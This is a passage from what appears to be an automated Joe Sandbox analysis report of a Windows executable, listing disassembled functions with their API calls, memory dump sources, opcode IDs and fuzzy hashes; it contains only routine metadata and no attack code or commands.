                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              • Opcode ID: 207b0c8bd0f404490c76452f8a449c0617f161c97eaf44368823125026a2e24c
                                                                                              • Instruction ID: fb0399a255ce17d2fe0706bfc5da216ca3ad48b7e40877c7ff3cccd8ce82fda6
                                                                                              • Opcode Fuzzy Hash: 207b0c8bd0f404490c76452f8a449c0617f161c97eaf44368823125026a2e24c
                                                                                              • Instruction Fuzzy Hash: 79010871901754DAD715EBA8C2627EEFBE4AF64710F60445EF47A63282CBB42B08C761
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A4A7FE Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00A4DBEC,00000000,?,00A480B1,?,00000008,?,00A4A871,?,?,?), ref: 00A4A830
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocateHeap
                                                                                              • String ID:
                                                                                              • API String ID: 1279760036-0
                                                                                              • Opcode ID: 06484221cc2a64c532bfa09f87631a66199b3b6e04a164dfcc5482d058308aab
                                                                                              • Instruction ID: 387bc5adbcd45f9b8255141878a9014070c87ac566a00e646e7fe6fb2814380b
                                                                                              • Opcode Fuzzy Hash: 06484221cc2a64c532bfa09f87631a66199b3b6e04a164dfcc5482d058308aab
                                                                                              • Instruction Fuzzy Hash: 92E06D7E28422256E63127A6AD01BAB3A98DFF27A1F150120BC4696092DB25CC12C2E3
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A2A880 Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • FindCloseChangeNotification.KERNELBASE(000000FF,?,?,00A2A83D,?,?,?,?,?,00A5380F,000000FF), ref: 00A2A89B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: ChangeCloseFindNotification
                                                                                              • String ID:
                                                                                              • API String ID: 2591292051-0
                                                                                              • Opcode ID: 8f81a175aae899ec4ba386348f5be0e4251634667f3cc9324236dca2b9d18c96
                                                                                              • Instruction ID: 03e7a3cfe4166001682477b55c4a8cc444a28b24b9ffd5a82be9cb4dcf2312ca
                                                                                              • Opcode Fuzzy Hash: 8f81a175aae899ec4ba386348f5be0e4251634667f3cc9324236dca2b9d18c96
                                                                                              • Instruction Fuzzy Hash: 54F08231485B259FDB348B28E448792B7E4AB22325F141B6ED0E2439E5D3756A8F8A41
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A2B966 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00A2BA94: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00A2B98B,000000FF,?,?), ref: 00A2BABD
                                                                                                • Part of subcall function 00A2BA94: FindFirstFileW.KERNEL32(?,?,?,?,00000800,?,?,?,?,00A2B98B,000000FF,?,?), ref: 00A2BAEB
                                                                                                • Part of subcall function 00A2BA94: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00A2B98B,000000FF,?,?), ref: 00A2BAF7
                                                                                              • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00A2B991
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: Find$FileFirst$CloseErrorLast
                                                                                              • String ID:
                                                                                              • API String ID: 1464966427-0
                                                                                              • Opcode ID: fbc8dcfa2f9e764cecd5d20ac4e816d76e69c2cecfe0a3f123c4ecb3dee43e20
                                                                                              • Instruction ID: 5ede75603a531cbaff0ad57b54112a24e977f7b981f7a180693d0021dc917a9c
                                                                                              • Opcode Fuzzy Hash: fbc8dcfa2f9e764cecd5d20ac4e816d76e69c2cecfe0a3f123c4ecb3dee43e20
                                                                                              • Instruction Fuzzy Hash: 25F082320187A0ABCB225BBC69047CBBB906F1A335F148A59F2FE122D2C37450D59732
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A32128 Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetThreadExecutionState.KERNEL32(00000001), ref: 00A3215D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExecutionStateThread
                                                                                              • String ID:
                                                                                              • API String ID: 2211380416-0
                                                                                              • Opcode ID: ac0fd11823adf712580e6196080ec24031af372ea3eb7a7930703b4a5dea44ab
                                                                                              • Instruction ID: 9f686cdd5f87592c7d96f45af6a64a2ff99a055da1671f1f608b64bf6e4bd76d
                                                                                              • Opcode Fuzzy Hash: ac0fd11823adf712580e6196080ec24031af372ea3eb7a7930703b4a5dea44ab
                                                                                              • Instruction Fuzzy Hash: D5D0123161812052DE16737C6A56BBD1A665FDA325F1900A6F209571D38B54094793B1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A3B636 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GdipAlloc.GDIPLUS(00000010), ref: 00A3B63C
                                                                                                • Part of subcall function 00A3B3C8: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00A3B3E9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: Gdip$AllocBitmapCreateFromStream
                                                                                              • String ID:
                                                                                              • API String ID: 1915507550-0
                                                                                              • Opcode ID: 67c6c0b1a9f8045d953eebf11179e7c179da5fb7bf356439fdf6af47a3be8cb5
                                                                                              • Instruction ID: e14751f23082cfc85a33379e58af355c1d91bec07a23164e49456cfa79e4135a
                                                                                              • Opcode Fuzzy Hash: 67c6c0b1a9f8045d953eebf11179e7c179da5fb7bf356439fdf6af47a3be8cb5
                                                                                              • Instruction Fuzzy Hash: 34D0C7306242097ADF416B618D03A7E7696DB10384F008136BA4599191EBB1D9606575
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A26920 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00A26925
                                                                                                • Part of subcall function 00A304E5: __EH_prolog.LIBCMT ref: 00A304EA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              • Opcode ID: bee3f1dd9f9d012ac0fc3671e6d09c037233c5c85881bb4d0ff41e453dacfdbd
                                                                                              • Instruction ID: 1af96b8de70a825380119fdb73abc523234557506c1127d3ff62a2567437fee2
                                                                                              • Opcode Fuzzy Hash: bee3f1dd9f9d012ac0fc3671e6d09c037233c5c85881bb4d0ff41e453dacfdbd
                                                                                              • Instruction Fuzzy Hash: AED05EB2F105359BCB05BB4895217AEB264EB44705F10016AF411A3782CBB44B008784
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A3F747 Relevance: 1.5, APIs: 1, Instructions: 13COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • DloadProtectSection.DELAYIMP ref: 00A3F76F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: DloadProtectSection
                                                                                              • String ID:
                                                                                              • API String ID: 2203082970-0
                                                                                              • Opcode ID: b8f6fefa775dfaaa6d8bdfcb6c406e4fda857f74cca846a56b0126ba9a559c03
                                                                                              • Instruction ID: 8802dd27bbde51f2010cce697cbdf18936bd870c5bd69152106172e58c6bae5f
                                                                                              • Opcode Fuzzy Hash: b8f6fefa775dfaaa6d8bdfcb6c406e4fda857f74cca846a56b0126ba9a559c03
                                                                                              • Instruction Fuzzy Hash: 5CD01231D70304AFCA51EBB49D4672422B0F30CB19F504D31F541821A1C76065458711
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A3EEBD Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00A32E88), ref: 00A3EEE2
                                                                                                • Part of subcall function 00A3C758: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00A3C769
                                                                                                • Part of subcall function 00A3C758: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00A3C77A
                                                                                                • Part of subcall function 00A3C758: IsDialogMessageW.USER32(0001046C,?), ref: 00A3C78E
                                                                                                • Part of subcall function 00A3C758: TranslateMessage.USER32(?), ref: 00A3C79C
                                                                                                • Part of subcall function 00A3C758: DispatchMessageW.USER32(?), ref: 00A3C7A6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                                                              • String ID:
                                                                                              • API String ID: 897784432-0
                                                                                              • Opcode ID: 655087c58a4fc15d71ae2a01ca54fe927b66a1410ec14c37ea6fff945e174ce0
                                                                                              • Instruction ID: 8772723b47c2a1a0c09da63d349718525b5a2e0b301762b1c4dd123356625ed8
                                                                                              • Opcode Fuzzy Hash: 655087c58a4fc15d71ae2a01ca54fe927b66a1410ec14c37ea6fff945e174ce0
                                                                                              • Instruction Fuzzy Hash: 0FD09E32144240AED6026B51CE06F0A7AF2BB98B05F004554B645340B1C6A29D21AF02
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A2AB1C Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetFileType.KERNELBASE(000000FF,00A2AA1E), ref: 00A2AB28
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileType
                                                                                              • String ID:
                                                                                              • API String ID: 3081899298-0
                                                                                              • Opcode ID: 5cc849e5027777c2e4a788204441fe39f6156593a5f4a8a5d78612f9b6010480
                                                                                              • Instruction ID: 4946f589b84d86ff9c16a8ae50b871d58526c89ab23037ea5e899721e9ec502c
                                                                                              • Opcode Fuzzy Hash: 5cc849e5027777c2e4a788204441fe39f6156593a5f4a8a5d78612f9b6010480
                                                                                              • Instruction Fuzzy Hash: 28C01234400215878E304B68B8540557623EB623767B493A5C065C50A1C3268C83E502
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A3F3A0 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00A3F33D
                                                                                                • Part of subcall function 00A3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A3FA5C
                                                                                                • Part of subcall function 00A3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 4789121eb8a7fec946e68dd7e651721ac7c1f6f307003b87026b5e80b50f5b4c
                                                                                              • Instruction ID: 6da8afc8c7a9b37737fb3f9016c6617634631d140e22b0fa947afdeb77ad5445
                                                                                              • Opcode Fuzzy Hash: 4789121eb8a7fec946e68dd7e651721ac7c1f6f307003b87026b5e80b50f5b4c
                                                                                              • Instruction Fuzzy Hash: E9B01291A79002BD3254B1642D07F36032CE4D0F117308D3FFC00C4140D4500C091231
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A3F3AA Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00A3F33D
                                                                                                • Part of subcall function 00A3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A3FA5C
                                                                                                • Part of subcall function 00A3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: b914657c5ed47610d2bf1be81e348f83f75c9059c4c4319ebad720c14e490e0b
                                                                                              • Instruction ID: bca7d913a76b2776226b9a31c550defeaba576586a6874d1d41080915b021f72
                                                                                              • Opcode Fuzzy Hash: b914657c5ed47610d2bf1be81e348f83f75c9059c4c4319ebad720c14e490e0b
                                                                                              • Instruction Fuzzy Hash: F1B012A1A790027D3254B1242D07F3A022CE4D0B11730993FFC00C4040D4400C051231
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A3F3BE Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00A3F33D
                                                                                                • Part of subcall function 00A3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A3FA5C
                                                                                                • Part of subcall function 00A3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: d4de59858c9c55b0e39232bf688a90bb50a20cc8193a49eaca9249ff7949947d
                                                                                              • Instruction ID: 3d5488c30e077d0c2929d57bedef38af6cfcfff26065a0d3ee40aaa9ea5a64df
                                                                                              • Opcode Fuzzy Hash: d4de59858c9c55b0e39232bf688a90bb50a20cc8193a49eaca9249ff7949947d
                                                                                              • Instruction Fuzzy Hash: E8B012A5A790027D3254B1242E07F36022CE4D0B11730593FFC00C8040D4800D061231
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A3F382 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00A3F33D
                                                                                                • Part of subcall function 00A3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A3FA5C
                                                                                                • Part of subcall function 00A3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 84d106c573f07b4ce594d155a6b2a41cd6ce5cbcf77987563032c37f395d9ce8
                                                                                              • Instruction ID: c487175b0f813e6f287010b73944e8cd420253d4500c16045b1ca49cc480e8d9
                                                                                              • Opcode Fuzzy Hash: 84d106c573f07b4ce594d155a6b2a41cd6ce5cbcf77987563032c37f395d9ce8
                                                                                              • Instruction Fuzzy Hash: 9CB01291A790027D3254B5242D07F3A022CD4D0B11730C93FFC00C4140D4500C091231
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A3F38C Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00A3F33D
                                                                                                • Part of subcall function 00A3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A3FA5C
                                                                                                • Part of subcall function 00A3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3FA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
